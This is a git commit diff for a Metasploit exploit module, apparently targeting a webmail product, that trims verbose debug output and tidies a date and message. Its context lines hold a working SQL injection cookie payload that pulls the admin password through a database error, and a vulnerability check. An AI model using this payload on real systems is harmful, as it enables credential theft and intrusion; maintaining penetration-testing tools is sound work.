Removed some overly verbose output.
parent
1ede519b8d
commit
f48bb4250e
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'SSL' => true
|
||||
},
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'June 29 2015'
|
||||
'DisclosureDate' => 'Jun 29 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -66,9 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
|
||||
})
|
||||
uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
|
||||
vprint_status(uri1)
|
||||
if res and res.body =~ /invalid input syntax for integer/
|
||||
vprint_status("Looks vulnerable to the SQLi issue, probably fully vuln")
|
||||
vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
vprint_status("**Sad trumpet sound**")
|
||||
|
@ -103,7 +102,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#Find the hash token needed to login
|
||||
login_hash = ''
|
||||
vprint_status(get_login_hash.body)
|
||||
get_login_hash.body.each_line do |line|
|
||||
next if line !~ /name="hash" value="(.*)"/
|
||||
login_hash = $1
|
||||
|
|
Loading…
Reference in New Issue